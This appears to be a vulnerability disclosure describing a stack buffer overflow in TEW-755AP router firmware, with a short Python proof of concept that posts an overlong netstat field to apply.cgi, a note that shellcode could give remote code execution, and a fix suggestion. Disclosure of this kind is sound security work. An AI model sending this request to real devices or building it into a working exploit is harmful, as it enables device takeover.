We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action tools_netstat (sub_41E730) of the file /www/cgi/ssi, the value of cameo.cameo.netstat_rsname is directly copied to stack buffer v11 without size check. An attacker can specify the input as a very long string in the post data and send the POST Request to apply.cgi to overflow the stack buffer, and finally can perform a Remote Code Execution attack.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'action' : "tools_netstat",
"cameo.cameo.netstat_rsname" : "a"*0x100}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If it’s a malicious shellcode then the system will be controlled by the attacker.

Fix Suggestion:

Use strncpy to avoid buffer overflow